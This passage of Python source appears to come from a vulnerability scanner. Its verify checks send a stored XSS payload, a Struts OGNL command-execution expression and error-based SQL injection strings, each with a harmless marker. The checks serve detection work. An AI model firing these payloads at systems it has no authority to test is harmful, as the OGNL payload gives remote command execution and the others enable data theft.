            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            arg = '{target}'.format(target=self.target)
            # Build the XSS payload.
            self.output.info('正在构造xss payload')
            payload1 = "/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent"
            # title is the URL-encoded form of <img src=x onerror=alert(1)>.
            data = '''tid=&title=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&keyword=cscanpoc&ispush=0&iscommend=1&isslides=0&islock=0&summary=cscanpoc&content=%09%09%09%09%09cscanpoc'''
            vul_url1 = arg + payload1
            # NOTE(review): this reads option 'cookie' (singular) while the other
            # checks in this file read 'cookies' — confirm which name the option
            # registry defines.
            headers = {
                'Content-Type': 'application/x-www-form-urlencoded',
                'Cookie': self.get_option('cookie')
            }
            # Insert response is not inspected.
            response1 = requests.post(vul_url1, headers=headers, data=data)

            # Check whether the XSS fired: read back the article list.
            self.output.info('验证xss是否成功触发')
            # The _=... query value is a fixed literal (presumably a cache-buster).
            payload2 = "/index.php?s=/admin/articlem/index.html&_=1532271572256"
            vul_url2 = arg + payload2
            response2 = requests.get(vul_url2, headers=headers)
            # Exact-substring match: any escaping or attribute reordering by the
            # application makes this a false negative.
            if response2.status_code == 200 and '<td><img src=x onerror=alert(1)></td>' in response2.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))
        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Verify check for OGNL injection in a Struts ``user.action`` form.

        Posts a registration form whose ``age`` field is an OGNL expression
        that runs ``echo`` with a fixed marker and reads the command's output;
        the vulnerability is reported when that marker appears in the response.

        Reads ``self.target``, ``self.vuln`` and the ``base_path`` option;
        rebinds ``self.target``. Exceptions are logged, never raised.
        """
        # Rebase the target onto base_path (mutates self.target; not idempotent).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            # Form fields: username/email are filler; age carries the expression.
            # The marker 92933839f1efb2da9a4799753ee8d79c is only echoed back if the
            # expression is evaluated server-side.
            data = {
                'username':
                '''cscan''',
                'email':
                '''cscan''',
                'age':
                """'+ (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo 92933839f1efb2da9a4799753ee8d79c').getInputStream())) + '"""
            }
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))
            request = requests.post(
                '{target}/user.action'.format(target=self.target), data=data)
            r = request.text
            # Status code is not checked; the marker alone decides.
            if '92933839f1efb2da9a4799753ee8d79c' in r:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Verify check for error-based SQL injection in ``member.php?action=cz``.

        Posts a ``cckkey`` value containing an ``updatexml(...)`` expression
        that embeds ``md5(c)`` in the XPath error, and reports the
        vulnerability when the MD5 of ``'c'`` appears in the response.

        Reads ``self.target``, ``self.vuln`` and the ``base_path`` option;
        rebinds ``self.target``. The request carries no cookies and no extra
        headers (see below). Exceptions are logged, never raised.
        """
        # Rebase the target onto base_path (mutates self.target; not idempotent).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            # Logged-in user.
            # Obtain cookies.
            # The triple-quoted block below is a bare string expression, not
            # code: cookies stays an empty dict.
            cookies = {}
            '''
            raw_cookies = 'bid=xxxxx;_pk_ref.100001.8cb4=xxxxxxx;__utma=xxxxx'
            for line in raw_cookies.split(';'):  
                key,value=line.split('=',1)#1代表只分一次,得到两个数据  
                cookies[key]=value 
            '''
            # The path may differ per install directory; adjust to the actual
            # deployment.
            payload = '/upload/member.php?action=cz'
            data = "cckkey=aaaa0' or updatexml(1,concat(0x7e,(md5(c))),0) or '"
            url = self.target + payload
            # NOTE(review): the empty cookies dict is passed as headers=, not
            # cookies=; either way nothing is added to the request.
            r = requests.post(url, headers=cookies, data=data)

            # Marker is md5('c').
            if '4a8a08f09d37b73795649038408b5f33' in r.text:
                self.output.report(
                    self.vuln,
                    '发现{target}存在{name}漏洞'.format(target=self.target,
                                                  name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))
    def verify(self) -> None:
        """Verify check for SQL injection in ``poll_update.php`` (``gb_poll``).

        Fetches the target root, collects every ``po_id`` hidden-field value,
        and for each one posts an injected ``gb_poll`` parameter; the
        vulnerability is reported (once per matching poll) when the response
        is a 200 containing the MD5 of ``'123'``.

        Reads ``self.target``, ``self.vuln`` and the ``base_path`` option;
        rebinds ``self.target``. Exceptions are logged, never raised.
        """
        # Rebase the target onto base_path (mutates self.target; not idempotent).
        self.target = self.target.rstrip('/') + '/' + (
            self.get_option('base_path').lstrip('/'))
        try:
            self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
                target=self.target, vuln=self.vuln))

            url = self.target
            req = requests.get(url)

            if req.status_code == 200:
                # Poll ids are scraped from hidden inputs on the landing page;
                # no ids means no further requests.
                po_ids = re.findall(r'name="po_id" value="(\d+)"', req.text)
                for po_id in po_ids:
                    verify_url = url + '/poll_update.php'
                    # NOTE(review): these adjacent literals concatenate with no
                    # separator between 'select' / 'count' and 'by' / 'x', so the
                    # assembled string may not read as intended — inspect the
                    # resulting body before trusting a negative result. The
                    # _SERVER[REMOTE_ADDR] field is a fixed literal.
                    post = (
                        "_SERVER[REMOTE_ADDR]=86117&po_id=%s&gb_poll=1=1 and(select 1 from(select"
                        "count(*),concat((select md5(123)),floor(rand(0)*2))x from information_schema.tables group by"
                        "x)a)") % po_id

                    reqp = requests.post(verify_url, data=post)
                    # Marker is md5('123').
                    if reqp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in reqp.text:
                        self.output.report(
                            self.vuln,
                            '发现{target}存在{name}漏洞'.format(target=self.target,
                                                          name=self.vuln.name))

        except Exception as e:
            self.output.info('执行异常{}'.format(e))